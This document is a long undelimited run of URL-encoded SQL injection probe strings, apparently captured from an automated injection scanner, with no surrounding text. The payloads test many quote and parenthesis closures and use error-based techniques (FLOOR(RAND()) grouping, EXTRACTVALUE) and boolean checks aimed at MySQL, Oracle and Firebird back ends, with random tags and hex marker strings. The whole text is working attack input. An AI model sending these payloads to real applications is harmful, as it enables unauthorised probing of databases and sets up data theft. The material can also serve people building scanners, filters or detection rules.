1%22%29%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%22Pgwf%22%20LIKE%20%22Pgwf 1%22%29%29%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%28%22hZib%22%20LIKE%20%22hZib 1%22%29%29%29%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%28%28%22GFYH%22%20LIKE%20%22GFYH 1%22%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%22VyPn%22%20LIKE%20%22VyPn 1%25%27%29%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%27%25%27%3D%27 1%00%27%29%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%28%27VZPK%27%3D%27VZPK 1%00%27%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20AND%20%27XSnG%27%3D%27XSnG 1%27%29%20WHERE%206834%3D6834%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20--%20 1%22%29%20WHERE%201156%3D1156%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20--%20 1%27%20WHERE%204901%3D4901%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20--%20 1%22%20WHERE%207848%3D7848%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20--%20 1%27%7C%7C%28SELECT%20%27QztW%27%20FROM%20DUAL%20WHERE%201592%3D1592%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27QxyP%27%20WHERE%205477%3D5477%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20%29%7C%7C%27 1%27%2B%28SELECT%20LMVJ%20WHERE%205373%3D5373%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20%29%2B%27 1%27%2B%28SELECT%20%27uyCE%27%20WHERE%201687%3D1687%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%204795%3D%28%27%3Ansk%3A%27%7C%7C%28SELECT%20CASE%204795%20WHEN%204795%20THEN%201%20ELSE%200%20END%20FROM%20RDB%24DATABASE%29%7C%7C%27%3Abpy%3A%27%29%20%23 -5367%29%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -6407%29%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%286152%3D6152 -7306%29%29%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%281039%3D1039 -8742%29%29%29%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%288534%3D8534 -7062%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -5161%29%20WHERE%206360%3D6360%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 -8946%20WHERE%207596%3D7596%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 -3807%27%29%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -1943%27%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -5014%22%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -7159%27%29%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27kKKz%27%3D%27kKKz -6237%27%29%29%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27Pvtk%27%3D%27Pvtk -8483%27%29%29%29%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27xUHc%27%3D%27xUHc -3280%27%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27YnPq%27%3D%27YnPq -7674%27%29%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27FtPK%27%20LIKE%20%27FtPK -4246%27%29%29%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27fXLb%27%20LIKE%20%27fXLb -8814%27%29%29%29%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27axXV%27%20LIKE%20%27axXV -3900%27%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27GrGi%27%20LIKE%20%27GrGi -2220%22%29%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22dVPQ%22%3D%22dVPQ -2567%22%29%29%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22xqBV%22%3D%22xqBV -5933%22%29%29%29%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22wdRl%22%3D%22wdRl -9908%22%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22iCUW%22%3D%22iCUW -6126%22%29%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22EWLo%22%20LIKE%20%22EWLo -6131%22%29%29%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22HKkh%22%20LIKE%20%22HKkh -2743%22%29%29%29%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22tptv%22%20LIKE%20%22tptv -1521%22%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22lBaV%22%20LIKE%20%22lBaV -3295%25%27%29%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27%25%27%3D%27 -5497%25%27%29%29%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27%25%27%3D%27 -5464%25%27%29%29%29%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27%25%27%3D%27 -7739%25%27%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27%25%27%3D%27 -5113%00%27%29%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27cWmd%27%3D%27cWmd -6225%00%27%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27SMdV%27%3D%27SMdV -5768%27%29%20WHERE%209098%3D9098%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 -3968%22%29%20WHERE%202361%3D2361%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 -8855%27%20WHERE%208786%3D8786%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 -6078%22%20WHERE%209340%3D9340%20OR%20%28SELECT%208774%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288774%3D8774%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20--%20 1%29%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29 1%29%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%281801%3D1801 1%29%29%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%285436%3D5436 1%29%29%29%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%28%286346%3D6346 1%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29 1%29%20WHERE%201678%3D1678%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20--%20 1%20WHERE%204025%3D4025%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20--%20 1%27%29%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29 1%27%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29 1%22%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29 1%27%29%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%27DbAB%27%3D%27DbAB 1%27%29%29%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%28%27DUZK%27%3D%27DUZK 1%27%29%29%29%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%28%28%27tXYu%27%3D%27tXYu 1%27%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%27XRGr%27%3D%27XRGr 1%27%29%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%27OGGi%27%20LIKE%20%27OGGi 1%27%29%29%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%28%27aZsH%27%20LIKE%20%27aZsH 1%27%29%29%29%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%28%28%27hxGg%27%20LIKE%20%27hxGg 1%27%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%27IYhC%27%20LIKE%20%27IYhC 1%22%29%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%22Pkpf%22%3D%22Pkpf 1%22%29%29%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%28%22ZjWx%22%3D%22ZjWx 1%22%29%29%29%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%28%28%22GUgQ%22%3D%22GUgQ 1%22%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%22mMRY%22%3D%22mMRY 1%22%29%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%22hKfO%22%20LIKE%20%22hKfO 1%22%29%29%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%28%22IVpp%22%20LIKE%20%22IVpp 1%22%29%29%29%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%28%28%22RmrD%22%20LIKE%20%22RmrD 1%22%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%22BDGD%22%20LIKE%20%22BDGD 1%25%27%29%20OR%20EXTRACTVALUE%284014%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%284014%3D4014%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%27%25%27%3D%27 